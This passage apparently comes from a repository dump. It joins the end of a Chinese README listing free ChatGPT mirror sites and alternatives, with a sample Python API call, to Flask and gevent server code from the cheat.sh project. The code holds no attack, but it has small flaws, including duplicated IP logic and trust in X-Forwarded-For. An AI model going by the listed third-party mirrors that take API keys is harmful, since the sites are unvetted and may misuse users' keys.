<td>47</td> <td><del> <a href="https://chatgptdddd.com/" 
target="_blank">https://chatgptdddd.com/</a> </del> </td> <td>2023-06-06</td> </tr> <tr> <td>48</td> <td><del> <a href="http://gpt.hz-it-dev.com/" target="_blank">http://gpt.hz-it-dev.com/</a> </del> </td> <td>2023-05-30</td> </tr> <tr> <td>49</td> <td><del> <a href="https://www.freechatsgpt.com/" target="_blank">https://www.freechatsgpt.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>50</td> <td><del> <a href="https://qa.6bbs.cn/" target="_blank">https://qa.6bbs.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>51</td> <td><del> <a href="https://ai.dw3.io/" target="_blank">https://ai.dw3.io/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>52</td> <td><del> <a href="https://jiehan.tech/" target="_blank">https://jiehan.tech/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>53</td> <td><del> <a href="https://f1.52chye.cn/" target="_blank">https://f1.52chye.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>54</td> <td><del> <a href="https://a.aizh.app/" target="_blank">https://a.aizh.app/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>55</td> <td><del> <a href="https://gpt.xcbl.cc/" target="_blank">https://gpt.xcbl.cc/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>56</td> <td><del> <a href="https://chatgptproxy.info/" target="_blank">https://chatgptproxy.info/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>57</td> <td><del> <a href="https://chat.aicn.me/" target="_blank">https://chat.aicn.me/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>58</td> <td><del> <a href="https://ai.cheapy.top/" target="_blank">https://ai.cheapy.top/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>59</td> <td><del> <a href="https://chatgpt.hoposoft.com/" target="_blank">https://chatgpt.hoposoft.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>60</td> <td><del> <a href="https://askgptai.com/" target="_blank">https://askgptai.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>61</td> <td><del> <a href="https://chat.paoying.net/" target="_blank">https://chat.paoying.net/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>62</td> <td><del> <a href="https://chats.wxredcover.cn/" target="_blank">https://chats.wxredcover.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>63</td> <td><del> <a href="https://chat.zecoba.cn/" target="_blank">https://chat.zecoba.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>64</td> <td><del> <a href="https://account.eaten.fun" target="_blank">https://account.eaten.fun</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>65</td> <td><del> <a href="https://chat.livepo.top/" target="_blank">https://chat.livepo.top/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>66</td> <td><del> <a href="https://askbot.club/chatgpt" target="_blank">https://askbot.club/chatgpt</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>67</td> <td><del> <a href="https://talk.xiu.ee/" target="_blank">https://talk.xiu.ee/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>68</td> <td><del> <a href="https://1chat.c3r.ink/" target="_blank">https://1chat.c3r.ink/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>69</td> <td><del> <a href="https://ai.icodebug.xyz/" target="_blank">https://ai.icodebug.xyz/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>70</td> <td><del> <a href="https://aitxt.io/" target="_blank">https://aitxt.io/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>71</td> <td><del> <a href="https://chat.v50.ltd" target="_blank">https://chat.v50.ltd</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>72</td> <td><del> 
<a href="https://1.nb8.ltd/" target="_blank">https://1.nb8.ltd/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>73</td> <td><del> <a href="https://srgfdfsf.xiaowenzi.xyz/" target="_blank">https://srgfdfsf.xiaowenzi.xyz/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>74</td> <td><del> <a href="https://chataibase.com/" target="_blank">https://chataibase.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>75</td> <td><del> <a href="https://aiia.chat/" target="_blank">https://aiia.chat/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>76</td> <td><del> <a href="https://1919abc.com" target="_blank">https://1919abc.com</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>77</td> <td><del> <a href="https://chat.bk8787.com/" target="_blank">https://chat.bk8787.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>78</td> <td><del> <a href="https://chatgpt.dreamtrend.net/" target="_blank">https://chatgpt.dreamtrend.net/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>79</td> <td><del> <a href="http://1.15.134.164:999/" target="_blank">http://1.15.134.164:999/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>80</td> <td><del> <a href="https://chat.aidutu.cn/" target="_blank">https://chat.aidutu.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>81</td> <td><del> <a href="http://207.148.94.37:7860/" target="_blank">http://207.148.94.37:7860/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>82</td> <td><del> <a href="https://ai-pig-fly.space/" target="_blank">https://ai-pig-fly.space/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>83</td> <td><del> <a href="https://gpt.ai8.icu/" target="_blank">https://gpt.ai8.icu/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>84</td> <td><del> <a href="https://x1.xjai.cc/" target="_blank">https://x1.xjai.cc/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>85</td> <td><del> <a href="http://chat.cutim.one/" target="_blank">http://chat.cutim.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>86</td> <td><del> <a href="http://chat.cutim.top/" target="_blank">http://chat.cutim.top/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>87</td> <td><del> <a href="https://chat.xiami.one/" target="_blank">https://chat.xiami.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>88</td> <td><del> <a href="https://chat.gptplus.one/" target="_blank">https://chat.gptplus.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>89</td> <td><del> <a href="http://www.msai.fun/" target="_blank">http://www.msai.fun/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>90</td> <td><del> <a href="https://chatmindai.com/#/chat" target="_blank">https://chatmindai.com/#/chat</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>91</td> <td><del> <a href="https://aigcfun.com/" target="_blank">https://aigcfun.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>92</td> <td><del> <a href="https://www.chat2ai.cn/" target="_blank">https://www.chat2ai.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>93</td> <td><del> <a href="https://ai.yiios.com/" target="_blank">https://ai.yiios.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>94</td> <td><del> <a href="https://ai117.com/" target="_blank">https://ai117.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>95</td> <td><del> <a href="https://chat.forchange.cn/" target="_blank">https://chat.forchange.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>96</td> <td><del> <a href="https://w.betai55.uk/" target="_blank">https://w.betai55.uk/</a> </del> </td> 
<td>2023-05-25</td> </tr> <tr> <td>97</td> <td><del> <a href="https://1chat.cc/" target="_blank">https://1chat.cc/</a> </del> </td> <td>2023-05-24</td> </tr> <tr> <td>98</td> <td><del> <a href="https://gpt.opengpt88.com/" target="_blank">https://gpt.opengpt88.com/</a> </del> </td> <td>2023-05-07</td> </tr> <tr> <td>99</td> <td><del> <a href="https://seven-star.org/" target="_blank">https://seven-star.org/</a> </del> </td> <td>2023-05-06</td> </tr> <tr> <td>100</td> <td><del> <a href="https://tubogpt.vercel.app/" target="_blank">https://tubogpt.vercel.app/</a> </del> </td> <td>2023-05-06</td> </tr> <tr> <td>101</td> <td><del> <a href="http://www.tdchatd.us" target="_blank">http://www.tdchatd.us</a> </del> </td> <td>2023-05-05</td> </tr> <tr> <td>102</td> <td><del> <a href="https://gpt.gpt0.icu/" target="_blank">https://gpt.gpt0.icu/</a> </del> </td> <td>2023-04-28</td> </tr> <tr> <td>103</td> <td><del> <a href="https://chat.hehanwang.com/" target="_blank">https://chat.hehanwang.com/</a> </del> </td> <td>2023-04-25</td> </tr> <tr> <td>104</td> <td><del> <a href="https://chat.8kg.co/" target="_blank">https://chat.8kg.co/</a> </del> </td> <td>2023-04-21</td> </tr> <tr> <td>105</td> <td><del> <a href="https://chat2.zhuleixx.top/" target="_blank">https://chat2.zhuleixx.top/</a> </del> </td> <td>2023-04-21</td> </tr> <tr> <td>106</td> <td><del> <a href="https://chat.ohtoai.com/" target="_blank">https://chat.ohtoai.com/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>107</td> <td><del> <a href="https://ai.zyun.vip/" target="_blank">https://ai.zyun.vip/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>108</td> <td><del> <a href="http://www.tdchat.vip/" target="_blank">http://www.tdchat.vip/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>109</td> <td><del> <a href="https://ai.bo-e.com/" target="_blank">https://ai.bo-e.com/</a> </del> </td> <td>2023-04-18</td> </tr> <tr> <td>110</td> <td><del> <a href="https://chat.zhuleixx.top/" target="_blank">https://chat.zhuleixx.top/</a> </del> </td> <td>2023-04-16</td> </tr> <tr> <td>111</td> <td><del> <a href="https://www.tdchat.com/" target="_blank">https://www.tdchat.com/</a> </del> </td> <td>2023-04-13</td> </tr> <tr> <td>112</td> <td><del> <a href="https://gpt6.fun/" target="_blank">https://gpt6.fun/</a> </del> </td> <td>2023-04-11</td> </tr> <tr> <td>113</td> <td><del> <a href="https://chatgpt3.fun/" target="_blank">https://chatgpt3.fun/</a> </del> </td> <td>2023-04-11</td> </tr> <tr> <td>114</td> <td><del> <a href="https://heimoshuiyu.github.io/chatgpt-api-web/" target="_blank">https://heimoshuiyu.github.io/chatgpt-api-web/</a> </del> </td> <td>2023-04-10</td> </tr> <tr> <td>115</td> <td><del> <a href="http://gitopenchina.gitee.io/freechatgpt" target="_blank">http://gitopenchina.gitee.io/freechatgpt</a> </del> </td> <td>2023-04-10</td> </tr> <tr> <td>116</td> <td><del> <a href="https://freegpt.one/" target="_blank">https://freegpt.one/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>117</td> <td><del> <a href="http://gitopenchina.gitee.io/gpt" target="_blank">http://gitopenchina.gitee.io/gpt</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>118</td> <td><del> <a href="http://gitopenchina.gitee.io/chatgpt" target="_blank">http://gitopenchina.gitee.io/chatgpt</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>119</td> <td><del> <a href="https://qachat.vercel.app/" target="_blank">https://qachat.vercel.app/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>120</td> <td><del> <a href="https://chat.tgbot.co/" 
target="_blank">https://chat.tgbot.co/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>121</td> <td><del> <a href="https://chatgpt.ddiu.me/" target="_blank">https://chatgpt.ddiu.me/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>122</td> <td><del> <a href="https://chat.yqcloud.top/" target="_blank">https://chat.yqcloud.top/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>123</td> <td><del> <a href="https://www.aitoolgpt.com/" target="_blank">https://www.aitoolgpt.com/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>124</td> <td><del> <a href="https://www.chatsverse.xyz/" target="_blank">https://www.chatsverse.xyz/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>125</td> <td><del> <a href="https://chat.ninvfeng.xyz/" target="_blank">https://chat.ninvfeng.xyz/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>126</td> <td><del> <a href="https://qachat.cn/" target="_blank">https://qachat.cn/</a> </del> </td> <td>2023-04-03</td> </tr> <tr> <td>127</td> <td><del> <a href="https://greengpt.app/" target="_blank">https://greengpt.app/</a> </del> </td> <td>2023-04-01</td> </tr> <tr> <td>128</td> <td><del> <a href="https://www.askme.mom/" target="_blank">https://www.askme.mom/</a> </del> </td> <td>2023-04-01</td> </tr> <tr> <td>129</td> <td><del> <a href="https://www.bz1y.cn/" target="_blank">https://www.bz1y.cn/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>130</td> <td><del> <a href="https://xc.com/" target="_blank">https://xc.com/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>131</td> <td><del> <a href="https://www.scyu.app/" target="_blank">https://www.scyu.app/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>132</td> <td><del> <a href="https://chatgpt-flutter.h7ml.cn/" target="_blank">https://chatgpt-flutter.h7ml.cn/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>133</td> <td><del> <a href="https://chatapi.qload.cn/" target="_blank">https://chatapi.qload.cn/</a> </del> </td> <td>2023-03-22</td> </tr> </tbody> </table> <!-- abnormal-end --> </details> ## 🗨️ ChatGPT 替代方案 - 👍 [Poe - Fast, Helpful AI Chat](https://poe.com) - 在 Poe 上可与 ChatGPT、GPT-4o、Claude-3-Opus、DALLE 3 等数百万机器人交谈。 - [HuggingChat](https://huggingface.co/chat) - 让社区最好的 AI 聊天模型对所有人可用。 - [DuckDuckGo AI Chat](https://duckduckgo.com/?q=DuckDuckGo+AI+Chat&ia=chat&duckai=1) - 向 DuckDuckGo AI Chat 打个招呼! 匿名使用热门人工智能模型,包括 GPT-3.5、Claude 3 以及开源 Llama 3 和 Mixtral。 - [Chat with Open Large Language Models](https://chat.lmsys.org/) from <https://github.com/lm-sys/FastChat> - An open platform for training, serving, and evaluating large language models. Release repo for Vicuna and FastChat-T5. - [Microsoft Copilot](https://copilot.microsoft.com/) - 你的日常 AI 助手。 - [Meta AI](https://www.meta.ai/) - 使用 Meta AI 助手,免费生成图像,并回答任何问题。 - [Google Gemini](https://gemini.google.com/) - Gemini, 激发你的创造力和生产力。 - [Anthropic Claude](https://claude.ai/) - Claude is a next generation AI assistant built for work and trained to be safe, accurate, and secure. - [百度 文心一言](https://yiyan.baidu.com/) - [Open Assistant](https://open-assistant.io/) - 面向所有人的对话式 AI, 这是一个由 LAION 和全球贡献者共同开发的 GPT LLM 项目. - [阿里 通义大模型](https://tongyi.aliyun.com/) - 阿里大模型统一品牌,覆盖语言、听觉、多模态等领域;致力于实现接近人类智慧的通用智能,让 AI 从“单一感官”到“五官全开” - [讯飞星火认知大模型](https://xinghuo.xfyun.cn/) - 讯飞星火认知大模型,是由科大讯飞推出的大语言模型,能够通过自然语言理解,完成智能对答。 - [Pi, your personal AI](https://heypi.com/talk) - Hi, I'm Pi. I'm your personal AI, designed to be supportive, smart, and there for you anytime. Ask me for advice, for answers, or let's talk about whatever's on your mind. 
- [TruthGPT Chat](https://talk.truthgpt.one/) - Hey, I’m TruthGPT! The beacon of truth in a world of unknown. We can either have a conversation or you may ask me complex questions! - [昆仑万维天工大模型](https://tiangong.kunlun.com/) - 「天工」是国内首个对标 ChatGPT 的双千亿级大语言模型,也是一个对话式 AI 助手。 - [抖音旗下豆包小助手](https://www.doubao.com/) - 豆包是你的智能小助手,可以为你答疑解惑,提供灵感,辅助创作,也可以和你畅聊任何你感兴趣的话题。 - [OpenAgents](https://github.com/xlang-ai/OpenAgents) - ChatGPT Plus 功能(数据分析,插件,上网)开源复刻项目。 - [智谱清言](https://www.chatglm.cn/) - 智谱 AI 和清华大学 KEG 实验室联合发布的新一代对话预训练模型,基于 ChatGLM2 模型开发,支持多轮对话,具备内容创作、信息归纳总结等能力。 ## 📚 更多... ### 💿 构建你自己的 ChatGPT 镜像 - https://lobechat.com/ - LobeChat:个人 LLM 效能工具,给自己一个更聪明的大脑 - https://github.com/Yidadaa/ChatGPT-Next-Web - One-Click to deploy well-designed ChatGPT web UI on Vercel. 一键拥有你自己的 ChatGPT 网页服务。 - https://github.com/mckaywrigley/chatbot-ui - An open source ChatGPT UI. - https://github.com/Chanzhaoyu/chatgpt-web - 用 Express 和 Vue3 搭建的 ChatGPT 演示网页 - https://github.com/anse-app/chatgpt-demo - Minimal web UI for ChatGPT. - https://github.com/869413421/chatgpt-web - 基于 ChatGPT3.5 API 实现的私有化 web 程序 - https://github.com/ztjhz/BetterChatGPT - An amazing UI for OpenAI's ChatGPT (Website + Windows + MacOS + Linux) - https://github.com/ourongxing/chatgpt-vercel - Elegant and Powerful. Powered by OpenAI and Vercel. ### 💡 提示词(Prompt) - [GPT 最佳实践 - OpenAI API](https://platform.openai.com/docs/guides/gpt-best-practices) - [ChatGPT Prompt Engineering for Developers - DeepLearning.AI](https://www.deeplearning.ai/short-courses/chatgpt-prompt-engineering-for-developers/) - https://github.com/datawhalechina/prompt-engineering-for-developers - 吴恩达《ChatGPT Prompt Engineering for Developers》课程中文版 - https://github.com/f/awesome-chatgpt-prompts - The repo includes ChatGPT prompt curation to use ChatGPT better. ### 📝 自建内容库 - [ChatDOC - Chat with your documents](https://chatdoc.com/) - ChatDOC is a ChatGPT-based file-reading assistant that can quickly extract, locate and summarize information from documents, able to understand texts, tables and images. - [Humata - GPT for your files](https://www.humata.ai/) - Humata is like GPT for your files. Ask AI anything about your data. Ask questions about your data and get answers powered by AI instantly. Learn, summarize, synthesize, and extract valuable data from your files 100X faster. - [Chatbase | ChatGPT for your website](https://www.chatbase.co/) - Build an AI chatbot from your knowledge base and add it to your website. ### 💻 开发者工具 - 👍 [Codeium · Free AI Code Completion & Chat](https://codeium.com/) - Codeium offers best in class AI code completion & search — all for free. It supports over 70+ languages and integrates with your favorite IDEs, with lightning fast speeds and state-of-the-art suggestion quality. - [Cursor | Build Fast](https://www.cursor.so/) - The AI-first code editor. Build software faster in an editor designed for pair-programming with AI - [Bito AI - Become a 10X Dev with Bito AI - Bito](https://bito.ai/) - [Meaningful Code Tests for Busy Devs | CodiumAI](https://www.codium.ai/) - With CodiumAI, you get non-trivial tests suggested right inside your IDE, so you can code smart, create more value, and stay confident when you push. 
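Whether you use one of the 🔑 sites from the table above (supplying your own key, or a custom endpoint as in the bettergpt.chat note) or deploy one of the projects under 构建你自己的 ChatGPT 镜像, the front-end is ultimately issuing requests against an OpenAI-compatible `/v1/chat/completions` endpoint. The sketch below shows the shape of that request; the endpoint URL, key, and model name are placeholders to replace with your own.

```python
import requests

# Placeholders -- point these at your own OpenAI-compatible endpoint and key.
API_BASE = "https://api.openai.com/v1"  # or a custom endpoint offered by a mirror
API_KEY = "sk-..."                      # your API key (some mirrors accept an empty key)

def chat(prompt, model="gpt-3.5-turbo"):
    """Send a single user message and return the assistant's reply text."""
    resp = requests.post(
        f"{API_BASE}/chat/completions",
        headers={"Authorization": f"Bearer {API_KEY}"},
        json={"model": model, "messages": [{"role": "user", "content": prompt}]},
        timeout=60,
    )
    resp.raise_for_status()
    return resp.json()["choices"][0]["message"]["content"]

if __name__ == "__main__":
    print(chat("Hello!"))
```

The mirror UIs listed above add chat history, streaming, and key management on top of essentially this call.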
--- ### 🌟 Star History [![Star History Chart](https://api.star-history.com/svg?repos=LiLittleCat/awesome-free-chatgpt&type=Date)](https://star-history.com/#LiLittleCat/awesome-free-chatgpt&Date) ### 💞 Contributors [![Contributors](https://contrib.rocks/image?repo=LiLittleCat/awesome-free-chatgpt)](https://github.com/LiLittleCat/awesome-free-chatgpt/graphs/contributors)
cheat.sh
571377f2f79422398a701cb1864487124ec3dcc6
File: bin/srv.py #!/usr/bin/env python # # Serving cheat.sh with `gevent` # from gevent.monkey import patch_all from gevent.pywsgi import WSGIServer patch_all() import os import sys from app import app, CONFIG if '--debug' in sys.argv: # Not all debug mode features are available under `gevent` # https://github.com/pallets/flask/issues/3825 app.debug = True if 'CHEATSH_PORT' in os.environ: port = int(os.environ.get('CHEATSH_PORT')) else: port = CONFIG['server.port'] srv = WSGIServer((CONFIG['server.bind'], port), app) print("Starting gevent server on {}:{}".format(srv.address[0], srv.address[1])) srv.serve_forever() File: bin/release.py #!/usr/bin/env python from __future__ import print_function from datetime import datetime import os from os import path import re import shutil import subprocess from subprocess import Popen import sys SHARE_DIR = path.join(path.dirname(__file__), "../share/") def run(args): return Popen(args, stdout=sys.stdout, stderr=sys.stderr).wait() status = subprocess.check_output(["git", "status", "--porcelain"]) if len(status) > 0: print("Unclean working tree. Commit or stash changes first.", file=sys.stderr) sys.exit(1) timestamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S +0000") cht_curr = path.join(SHARE_DIR, "cht.sh.txt") cht_new = path.join(SHARE_DIR, "cht.sh.txt.new") re_version = re.compile(r"^__CHTSH_VERSION=(.*)$") re_timestamp = re.compile(r"^__CHTSH_DATETIME=.*$") with open(cht_curr, "rt") as fin: with open(cht_new, "wt") as fout: for line in fin: match = re_version.match(line) if match: version = int(match.group(1)) + 1 fout.write("__CHTSH_VERSION=%s\n" % version) continue match = re_timestamp.match(line) if match: fout.write('__CHTSH_DATETIME="%s"\n' % timestamp) continue fout.write(line) shutil.copymode(cht_curr, cht_new) os.remove(cht_curr) os.rename(cht_new, cht_curr) message = "cht: v%s" % version run(["git", "add", cht_curr]) run(["git", "commit", "-m", message]) run(["git", "tag", "cht@%s" % version, "-m", message]) File: bin/clean_cache.py import sys import redis REDIS = redis.Redis(host='localhost', port=6379, db=0) for key in sys.argv[1:]: REDIS.delete(key) File: bin/app.py #!/usr/bin/env python # vim: set encoding=utf-8 # pylint: disable=wrong-import-position,wrong-import-order """ Main server program. Configuration parameters: path.internal.malformed path.internal.static path.internal.templates path.log.main path.log.queries """ from __future__ import print_function import sys if sys.version_info[0] < 3: reload(sys) sys.setdefaultencoding('utf8') import sys import logging import os import requests import jinja2 from flask import Flask, request, send_from_directory, redirect, Response sys.path.append(os.path.abspath(os.path.join(__file__, "..", "..", "lib"))) from config import CONFIG from limits import Limits from cheat_wrapper import cheat_wrapper from post import process_post_request from options import parse_args from stateful_queries import save_query, last_query if not os.path.exists(os.path.dirname(CONFIG["path.log.main"])): os.makedirs(os.path.dirname(CONFIG["path.log.main"])) logging.basicConfig( filename=CONFIG["path.log.main"], level=logging.DEBUG, format='%(asctime)s %(message)s') # Fix Flask "exception and request logging" to `stderr`. # # When Flask's werkzeug detects that logging is already set, it # doesn't add its own logger that prints exceptions. 
stderr_handler = logging.StreamHandler() logging.getLogger().addHandler(stderr_handler) # # Alter log format to disting log lines from everything else stderr_handler.setFormatter(logging.Formatter('%(filename)s:%(lineno)s: %(message)s')) # # Sometimes werkzeug starts logging before an app is imported # (https://github.com/pallets/werkzeug/issues/1969) # resulting in duplicating lines. In that case we need root # stderr handler to skip lines from werkzeug. class SkipFlaskLogger(object): def filter(self, record): if record.name != 'werkzeug': return True if logging.getLogger('werkzeug').handlers: stderr_handler.addFilter(SkipFlaskLogger()) app = Flask(__name__) # pylint: disable=invalid-name app.jinja_loader = jinja2.ChoiceLoader([ app.jinja_loader, jinja2.FileSystemLoader(CONFIG["path.internal.templates"])]) LIMITS = Limits() PLAIN_TEXT_AGENTS = [ "curl", "httpie", "lwp-request", "wget", "python-requests", "openbsd ftp", "powershell", "fetch", "aiohttp", ] def _is_html_needed(user_agent): """ Basing on `user_agent`, return whether it needs HTML or ANSI """ return all([x not in user_agent for x in PLAIN_TEXT_AGENTS]) def is_result_a_script(query): return query in [':cht.sh'] @app.route('/files/<path:path>') def send_static(path): """ Return static file `path`. Can be served by the HTTP frontend. """ return send_from_directory(CONFIG["path.internal.static"], path) @app.route('/favicon.ico') def send_favicon(): """ Return static file `favicon.ico`. Can be served by the HTTP frontend. """ return send_from_directory(CONFIG["path.internal.static"], 'favicon.ico') @app.route('/malformed-response.html') def send_malformed(): """ Return static file `malformed-response.html`. Can be served by the HTTP frontend. """ dirname, filename = os.path.split(CONFIG["path.internal.malformed"]) return send_from_directory(dirname, filename) def log_query(ip_addr, found, topic, user_agent): """ Log processed query and some internal data """ log_entry = "%s %s %s %s\n" % (ip_addr, found, topic, user_agent) with open(CONFIG["path.log.queries"], 'ab') as my_file: my_file.write(log_entry.encode('utf-8')) def get_request_ip(req): """ Extract IP address from `request` """ if req.headers.getlist("X-Forwarded-For"): ip_addr = req.headers.getlist("X-Forwarded-For")[0] if ip_addr.startswith('::ffff:'): ip_addr = ip_addr[7:] else: ip_addr = req.remote_addr if req.headers.getlist("X-Forwarded-For"): ip_addr = req.headers.getlist("X-Forwarded-For")[0] if ip_addr.startswith('::ffff:'): ip_addr = ip_addr[7:] else: ip_addr = req.remote_addr return ip_addr def get_answer_language(request): """ Return preferred answer language based on domain name, query arguments and headers """ def _parse_accept_language(accept_language): languages = accept_language.split(",") locale_q_pairs = [] for language in languages: try: if language.split(";")[0] == language: # no q => q = 1 locale_q_pairs.append((language.strip(), "1")) else: locale = language.split(";")[0].strip() weight = language.split(";")[1].split("=")[1] locale_q_pairs.append((locale, weight)) except IndexError: pass return locale_q_pairs def _find_supported_language(accepted_languages): for lang_tuple in accepted_languages: lang = lang_tuple[0] if '-' in lang: lang = lang.split('-', 1)[0] return lang return None lang = None hostname = request.headers['Host'] if hostname.endswith('.cheat.sh'): lang = hostname[:-9] if 'lang' in request.args: lang = request.args.get('lang') header_accept_language = request.headers.get('Accept-Language', '') if lang is None and header_accept_language: 
lang = _find_supported_language( _parse_accept_language(header_accept_language)) return lang def _proxy(*args, **kwargs): # print "method=", request.method, # print "url=", request.url.replace('/:shell-x/', ':3000/') # print "headers=", {key: value for (key, value) in request.headers if key != 'Host'} # print "data=", request.get_data() # print "cookies=", request.cookies # print "allow_redirects=", False url_before, url_after = request.url.split('/:shell-x/', 1) url = url_before + ':3000/' if 'q' in request.args: url_after = '?' + "&".join("arg=%s" % x for x in request.args['q'].split()) url += url_after print(url) print(request.get_data()) resp = requests.request( method=request.method, url=url, headers={key: value for (key, value) in request.headers if key != 'Host'}, data=request.get_data(), cookies=request.cookies, allow_redirects=False) excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection'] headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers] response = Response(resp.content, resp.status_code, headers) return response @app.route("/", methods=['GET', 'POST']) @app.route("/<path:topic>", methods=["GET", "POST"]) def answer(topic=None): """ Main rendering function, it processes incoming weather queries. Depending on user agent it returns output in HTML or ANSI format. Incoming data: request.args request.headers request.remote_addr request.referrer request.query_string """ user_agent = request.headers.get('User-Agent', '').lower() html_needed = _is_html_needed(user_agent) options = parse_args(request.args) if topic in ['apple-touch-icon-precomposed.png', 'apple-touch-icon.png', 'apple-touch-icon-120x120-precomposed.png'] \ or (topic is not None and any(topic.endswith('/'+x) for x in ['favicon.ico'])): return '' request_id = request.cookies.get('id') if topic is not None and topic.lstrip('/') == ':last': if request_id: topic = last_query(request_id) else: return "ERROR: you have to set id for your requests to use /:last\n" else: if request_id: save_query(request_id, topic) if request.method == 'POST': process_post_request(request, html_needed) if html_needed: return redirect("/") return "OK\n" if 'topic' in request.args: return redirect("/%s" % request.args.get('topic')) if topic is None: topic = ":firstpage" if topic.startswith(':shell-x/'): return _proxy() #return requests.get('http://127.0.0.1:3000'+topic[8:]).text lang = get_answer_language(request) if lang: options['lang'] = lang ip_address = get_request_ip(request) if '+' in topic: not_allowed = LIMITS.check_ip(ip_address) if not_allowed: return "429 %s\n" % not_allowed, 429 html_is_needed = _is_html_needed(user_agent) and not is_result_a_script(topic) if html_is_needed: output_format='html' else: output_format='ansi' result, found = cheat_wrapper(topic, request_options=options, output_format=output_format) if 'Please come back in several hours' in result and html_is_needed: malformed_response = open(os.path.join(CONFIG["path.internal.malformed"])).read() return malformed_response log_query(ip_address, found, topic, user_agent) if html_is_needed: return result return Response(result, mimetype='text/plain') File: lib/fetch.py """ Repositories fetch and update This module makes real network and OS interaction, and the adapters only say how exctly this interaction should be done. 
Configuration parameters: * path.log.fetch """ from __future__ import print_function import sys import logging import os import subprocess import textwrap from globals import fatal import adapter import cache from config import CONFIG def _log(*message): logging.info(*message) if len(message) > 1: message = message[0].rstrip("\n") % tuple(message[1:]) else: message = message[0].rstrip("\n") sys.stdout.write(message+"\n") def _run_cmd(cmd): shell = isinstance(cmd, str) process = subprocess.Popen( cmd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output = process.communicate()[0] return process.returncode, output def fetch_all(skip_existing=True): """ Fetch all known repositories mentioned in the adapters """ def _fetch_locations(known_location): for location, adptr in known_location.items(): if location in existing_locations: continue cmd = adptr.fetch_command() if not cmd: continue sys.stdout.write("Fetching %s..." % (adptr)) sys.stdout.flush() try: process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) except OSError: print("\nERROR: %s" % cmd) raise output = process.communicate()[0] if process.returncode != 0: sys.stdout.write("\nERROR:\n---\n" + output) fatal("---\nCould not fetch %s" % adptr) else: print("Done") # Searching for location duplicates for different repositories known_location = {} for adptr in adapter.adapter.all_adapters(): location = adptr.local_repository_location() if not location: continue if location in known_location \ and adptr.repository_url() != known_location[location].repository_url(): fatal("Duplicate location: %s for %s and %s" % (location, adptr, known_location[location])) known_location[location] = adptr # Parent directories creation # target subdirectories will be create during the checkout process, # but the parent directories should be created explicitly. # Also we should make sure, that the target directory does not exist existing_locations = [] for location in known_location: if os.path.exists(location): if skip_existing: existing_locations.append(location) print("Already exists %s" % (location)) else: fatal("%s already exists" % location) parent = os.path.dirname(location) if os.path.exists(parent): continue 